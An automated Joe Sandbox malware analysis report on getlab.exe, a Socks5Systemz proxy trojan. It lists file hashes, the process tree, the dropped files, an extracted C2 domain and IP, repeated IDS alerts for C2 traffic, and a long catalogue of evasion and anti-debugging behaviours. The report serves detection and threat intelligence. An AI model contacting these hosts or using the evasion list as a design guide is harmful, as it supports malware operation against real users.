Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
getlab.exe

Overview

General Information

Sample name:getlab.exe
Analysis ID:1565505
MD5:15bd54ed3324a464c1deb1a883e7649e
SHA1:7a6853de5875b347fe48afb232d249e44efeb879
SHA256:7d728e3092520965203537354ccb0798292014885aecdefe1f22a988cb67661d
Tags:exeSocks5Systemzuser-aachum
Infos:

Detection

Socks5Systemz
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Socks5Systemz
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to infect the boot sector
Found API chain indicative of debugger detection
Machine Learning detection for dropped file
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • getlab.exe (PID: 5904 cmdline: "C:\Users\user\Desktop\getlab.exe" MD5: 15BD54ED3324A464C1DEB1A883E7649E)
    • getlab.tmp (PID: 5816 cmdline: "C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp" /SL5="$1043E,3351432,54272,C:\Users\user\Desktop\getlab.exe" MD5: A0CFF52B882184452424B6E618FA061B)
      • net.exe (PID: 2520 cmdline: "C:\Windows\system32\net.exe" pause xl_gear_11293 MD5: 31890A7DE89936F922D44D677F681A7F)
        • conhost.exe (PID: 2256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • net1.exe (PID: 5016 cmdline: C:\Windows\system32\net1 pause xl_gear_11293 MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
      • xlgear32.exe (PID: 3320 cmdline: "C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe" -i MD5: 9DC53D054BB2482253850DA5D8DFF405)
  • cleanup

Malware Configuration

Threatname: Socks5Systemz

{"C2 list": ["ayeyoji.ru"]}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\BridgeGamer\BridgeGamer.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
    C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
      C:\Users\user\AppData\Local\XLGear 3.1.3.157\is-S3UFM.tmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000001.00000002.2936760839.00000000058E0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
          00000004.00000002.2937183338.0000000002D91000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
            00000004.00000002.2937019748.0000000002CEA000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
              00000004.00000000.1688736742.0000000000401000.00000020.00000001.01000000.00000008.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                Process Memory Space: xlgear32.exe PID: 3320JoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security

                  Unpacked PEs

                  SourceRuleDescriptionAuthorStrings
                  4.0.xlgear32.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

                    Sigma Signatures

                    No Sigma rule has matched

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-30T02:33:53.594534+010020494671A Network Trojan was detected192.168.2.449736185.208.158.20280TCP
                    2024-11-30T02:33:54.179795+010020494671A Network Trojan was detected192.168.2.449736185.208.158.20280TCP
                    2024-11-30T02:33:58.262436+010020494671A Network Trojan was detected192.168.2.449736185.208.158.20280TCP
                    2024-11-30T02:33:58.849545+010020494671A Network Trojan was detected192.168.2.449736185.208.158.20280TCP
                    2024-11-30T02:34:00.572922+010020494671A Network Trojan was detected192.168.2.449746185.208.158.20280TCP
                    2024-11-30T02:34:02.227166+010020494671A Network Trojan was detected192.168.2.449752185.208.158.20280TCP
                    2024-11-30T02:34:03.917609+010020494671A Network Trojan was detected192.168.2.449758185.208.158.20280TCP
                    2024-11-30T02:34:04.497598+010020494671A Network Trojan was detected192.168.2.449758185.208.158.20280TCP
                    2024-11-30T02:34:05.066031+010020494671A Network Trojan was detected192.168.2.449758185.208.158.20280TCP
                    2024-11-30T02:34:06.739788+010020494671A Network Trojan was detected192.168.2.449764185.208.158.20280TCP
                    2024-11-30T02:34:08.320376+010020494671A Network Trojan was detected192.168.2.449770185.208.158.20280TCP
                    2024-11-30T02:34:09.937602+010020494671A Network Trojan was detected192.168.2.449771185.208.158.20280TCP
                    2024-11-30T02:34:11.556643+010020494671A Network Trojan was detected192.168.2.449777185.208.158.20280TCP
                    2024-11-30T02:34:13.226956+010020494671A Network Trojan was detected192.168.2.449783185.208.158.20280TCP
                    2024-11-30T02:34:14.944372+010020494671A Network Trojan was detected192.168.2.449788185.208.158.20280TCP
                    2024-11-30T02:34:16.553933+010020494671A Network Trojan was detected192.168.2.449790185.208.158.20280TCP
                    2024-11-30T02:34:18.166014+010020494671A Network Trojan was detected192.168.2.449795185.208.158.20280TCP
                    2024-11-30T02:34:19.845585+010020494671A Network Trojan was detected192.168.2.449800185.208.158.20280TCP
                    2024-11-30T02:34:21.511567+010020494671A Network Trojan was detected192.168.2.449803185.208.158.20280TCP
                    2024-11-30T02:34:22.101381+010020494671A Network Trojan was detected192.168.2.449803185.208.158.20280TCP
                    2024-11-30T02:34:23.884939+010020494671A Network Trojan was detected192.168.2.449809185.208.158.20280TCP
                    2024-11-30T02:34:25.556492+010020494671A Network Trojan was detected192.168.2.449814185.208.158.20280TCP
                    2024-11-30T02:34:27.189408+010020494671A Network Trojan was detected192.168.2.449820185.208.158.20280TCP
                    2024-11-30T02:34:28.850327+010020494671A Network Trojan was detected192.168.2.449825185.208.158.20280TCP
                    2024-11-30T02:34:30.470731+010020494671A Network Trojan was detected192.168.2.449828185.208.158.20280TCP
                    2024-11-30T02:34:32.109688+010020494671A Network Trojan was detected192.168.2.449833185.208.158.20280TCP
                    2024-11-30T02:34:32.691157+010020494671A Network Trojan was detected192.168.2.449833185.208.158.20280TCP
                    2024-11-30T02:34:34.309929+010020494671A Network Trojan was detected192.168.2.449839185.208.158.20280TCP
                    2024-11-30T02:34:35.944753+010020494671A Network Trojan was detected192.168.2.449844185.208.158.20280TCP
                    2024-11-30T02:34:37.661938+010020494671A Network Trojan was detected192.168.2.449849185.208.158.20280TCP
                    2024-11-30T02:34:39.304888+010020494671A Network Trojan was detected192.168.2.449853185.208.158.20280TCP
                    2024-11-30T02:34:40.919549+010020494671A Network Trojan was detected192.168.2.449858185.208.158.20280TCP
                    2024-11-30T02:34:41.503613+010020494671A Network Trojan was detected192.168.2.449858185.208.158.20280TCP
                    2024-11-30T02:34:43.116466+010020494671A Network Trojan was detected192.168.2.449864185.208.158.20280TCP
                    2024-11-30T02:34:44.735837+010020494671A Network Trojan was detected192.168.2.449869185.208.158.20280TCP
                    2024-11-30T02:34:46.404795+010020494671A Network Trojan was detected192.168.2.449873185.208.158.20280TCP
                    2024-11-30T02:34:48.037210+010020494671A Network Trojan was detected192.168.2.449878185.208.158.20280TCP
                    2024-11-30T02:34:49.693432+010020494671A Network Trojan was detected192.168.2.449883185.208.158.20280TCP
                    2024-11-30T02:34:51.306229+010020494671A Network Trojan was detected192.168.2.449888185.208.158.20280TCP
                    2024-11-30T02:34:53.021656+010020494671A Network Trojan was detected192.168.2.449891185.208.158.20280TCP
                    2024-11-30T02:34:54.635453+010020494671A Network Trojan was detected192.168.2.449896185.208.158.20280TCP
                    2024-11-30T02:34:56.331578+010020494671A Network Trojan was detected192.168.2.449901185.208.158.20280TCP
                    2024-11-30T02:34:57.905243+010020494671A Network Trojan was detected192.168.2.449905185.208.158.20280TCP
                    2024-11-30T02:34:59.511137+010020494671A Network Trojan was detected192.168.2.449910185.208.158.20280TCP
                    2024-11-30T02:35:01.180445+010020494671A Network Trojan was detected192.168.2.449915185.208.158.20280TCP
                    2024-11-30T02:35:02.800433+010020494671A Network Trojan was detected192.168.2.449920185.208.158.20280TCP
                    2024-11-30T02:35:04.465736+010020494671A Network Trojan was detected192.168.2.449923185.208.158.20280TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-30T02:33:53.594534+010020501121A Network Trojan was detected192.168.2.449736185.208.158.20280TCP
                    2024-11-30T02:33:54.179795+010020501121A Network Trojan was detected192.168.2.449736185.208.158.20280TCP
                    2024-11-30T02:33:58.262436+010020501121A Network Trojan was detected192.168.2.449736185.208.158.20280TCP
                    2024-11-30T02:33:58.849545+010020501121A Network Trojan was detected192.168.2.449736185.208.158.20280TCP
                    2024-11-30T02:34:00.572922+010020501121A Network Trojan was detected192.168.2.449746185.208.158.20280TCP
                    2024-11-30T02:34:02.227166+010020501121A Network Trojan was detected192.168.2.449752185.208.158.20280TCP
                    2024-11-30T02:34:03.917609+010020501121A Network Trojan was detected192.168.2.449758185.208.158.20280TCP
                    2024-11-30T02:34:04.497598+010020501121A Network Trojan was detected192.168.2.449758185.208.158.20280TCP
                    2024-11-30T02:34:05.066031+010020501121A Network Trojan was detected192.168.2.449758185.208.158.20280TCP
                    2024-11-30T02:34:06.739788+010020501121A Network Trojan was detected192.168.2.449764185.208.158.20280TCP
                    2024-11-30T02:34:08.320376+010020501121A Network Trojan was detected192.168.2.449770185.208.158.20280TCP
                    2024-11-30T02:34:09.937602+010020501121A Network Trojan was detected192.168.2.449771185.208.158.20280TCP
                    2024-11-30T02:34:11.556643+010020501121A Network Trojan was detected192.168.2.449777185.208.158.20280TCP
                    2024-11-30T02:34:13.226956+010020501121A Network Trojan was detected192.168.2.449783185.208.158.20280TCP
                    2024-11-30T02:34:14.944372+010020501121A Network Trojan was detected192.168.2.449788185.208.158.20280TCP
                    2024-11-30T02:34:16.553933+010020501121A Network Trojan was detected192.168.2.449790185.208.158.20280TCP
                    2024-11-30T02:34:18.166014+010020501121A Network Trojan was detected192.168.2.449795185.208.158.20280TCP
                    2024-11-30T02:34:19.845585+010020501121A Network Trojan was detected192.168.2.449800185.208.158.20280TCP
                    2024-11-30T02:34:21.511567+010020501121A Network Trojan was detected192.168.2.449803185.208.158.20280TCP
                    2024-11-30T02:34:22.101381+010020501121A Network Trojan was detected192.168.2.449803185.208.158.20280TCP
                    2024-11-30T02:34:23.884939+010020501121A Network Trojan was detected192.168.2.449809185.208.158.20280TCP
                    2024-11-30T02:34:25.556492+010020501121A Network Trojan was detected192.168.2.449814185.208.158.20280TCP
                    2024-11-30T02:34:27.189408+010020501121A Network Trojan was detected192.168.2.449820185.208.158.20280TCP
                    2024-11-30T02:34:28.850327+010020501121A Network Trojan was detected192.168.2.449825185.208.158.20280TCP
                    2024-11-30T02:34:30.470731+010020501121A Network Trojan was detected192.168.2.449828185.208.158.20280TCP
                    2024-11-30T02:34:32.109688+010020501121A Network Trojan was detected192.168.2.449833185.208.158.20280TCP
                    2024-11-30T02:34:32.691157+010020501121A Network Trojan was detected192.168.2.449833185.208.158.20280TCP
                    2024-11-30T02:34:34.309929+010020501121A Network Trojan was detected192.168.2.449839185.208.158.20280TCP
                    2024-11-30T02:34:35.944753+010020501121A Network Trojan was detected192.168.2.449844185.208.158.20280TCP
                    2024-11-30T02:34:37.661938+010020501121A Network Trojan was detected192.168.2.449849185.208.158.20280TCP
                    2024-11-30T02:34:39.304888+010020501121A Network Trojan was detected192.168.2.449853185.208.158.20280TCP
                    2024-11-30T02:34:40.919549+010020501121A Network Trojan was detected192.168.2.449858185.208.158.20280TCP
                    2024-11-30T02:34:41.503613+010020501121A Network Trojan was detected192.168.2.449858185.208.158.20280TCP
                    2024-11-30T02:34:43.116466+010020501121A Network Trojan was detected192.168.2.449864185.208.158.20280TCP
                    2024-11-30T02:34:44.735837+010020501121A Network Trojan was detected192.168.2.449869185.208.158.20280TCP
                    2024-11-30T02:34:46.404795+010020501121A Network Trojan was detected192.168.2.449873185.208.158.20280TCP
                    2024-11-30T02:34:48.037210+010020501121A Network Trojan was detected192.168.2.449878185.208.158.20280TCP
                    2024-11-30T02:34:49.693432+010020501121A Network Trojan was detected192.168.2.449883185.208.158.20280TCP
                    2024-11-30T02:34:51.306229+010020501121A Network Trojan was detected192.168.2.449888185.208.158.20280TCP
                    2024-11-30T02:34:53.021656+010020501121A Network Trojan was detected192.168.2.449891185.208.158.20280TCP
                    2024-11-30T02:34:54.635453+010020501121A Network Trojan was detected192.168.2.449896185.208.158.20280TCP
                    2024-11-30T02:34:56.331578+010020501121A Network Trojan was detected192.168.2.449901185.208.158.20280TCP
                    2024-11-30T02:34:57.905243+010020501121A Network Trojan was detected192.168.2.449905185.208.158.20280TCP
                    2024-11-30T02:34:59.511137+010020501121A Network Trojan was detected192.168.2.449910185.208.158.20280TCP
                    2024-11-30T02:35:01.180445+010020501121A Network Trojan was detected192.168.2.449915185.208.158.20280TCP
                    2024-11-30T02:35:02.800433+010020501121A Network Trojan was detected192.168.2.449920185.208.158.20280TCP
                    2024-11-30T02:35:04.465736+010020501121A Network Trojan was detected192.168.2.449923185.208.158.20280TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: xlgear32.exe.3320.4.memstrminMalware Configuration Extractor: Socks5Systemz {"C2 list": ["ayeyoji.ru"]}
                    Multi AV Scanner detection for submitted file
                    Source: getlab.exeReversingLabs: Detection: 18%
                    Source: getlab.exeVirustotal: Detection: 36%Perma Link
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for dropped file
                    Source: C:\ProgramData\BridgeGamer\BridgeGamer.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_0045CFA8 GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion,1_2_0045CFA8
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_0045D05C ArcFourCrypt,1_2_0045D05C
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_0045D074 ArcFourCrypt,1_2_0045D074
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_10001000 ISCryptGetVersion,1_2_10001000
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_10001130 ArcFourCrypt,1_2_10001130

                    Compliance

                    barindex
                    Detected unpacking (overwrites its own PE header)
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeUnpacked PE file: 4.2.xlgear32.exe.400000.0.unpack
                    Source: getlab.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\XLGear_is1Jump to behavior
                    Source: Binary string: msvcp71.pdbx# source: is-K4GKL.tmp.1.dr
                    Source: Binary string: msvcr71.pdb< source: is-Q00OL.tmp.1.dr
                    Source: Binary string: msvcp71.pdb source: is-K4GKL.tmp.1.dr
                    Source: Binary string: MicrosoftWindowsGdiPlus-1.0.2600.1360-gdiplus.pdb source: is-4GRQU.tmp.1.dr
                    Source: Binary string: msvcr71.pdb source: is-Q00OL.tmp.1.dr
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_00452A34 FindFirstFileA,GetLastError,1_2_00452A34
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_00474D70 FindFirstFileA,FindNextFileA,FindClose,1_2_00474D70
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_00462578 FindFirstFileA,FindNextFileA,FindClose,1_2_00462578
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_004975B0 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,1_2_004975B0
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_00463B04 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00463B04
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_00463F80 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00463F80

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49758 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49758 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49736 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49736 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49752 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49752 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49770 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49777 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49777 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49770 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49746 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49746 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49764 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49764 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49800 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49800 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49828 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49820 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49820 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49809 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49809 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49828 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49814 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49825 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49825 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49795 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49795 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49833 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49833 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49883 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49883 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49873 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49873 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49814 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49853 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49853 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49878 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49878 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49844 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49844 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49869 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49869 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49888 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49888 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49858 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49858 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49896 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49896 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49891 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49891 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49771 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49771 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49788 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49788 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49849 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49849 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49864 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49864 -> 185.208.158.202:80
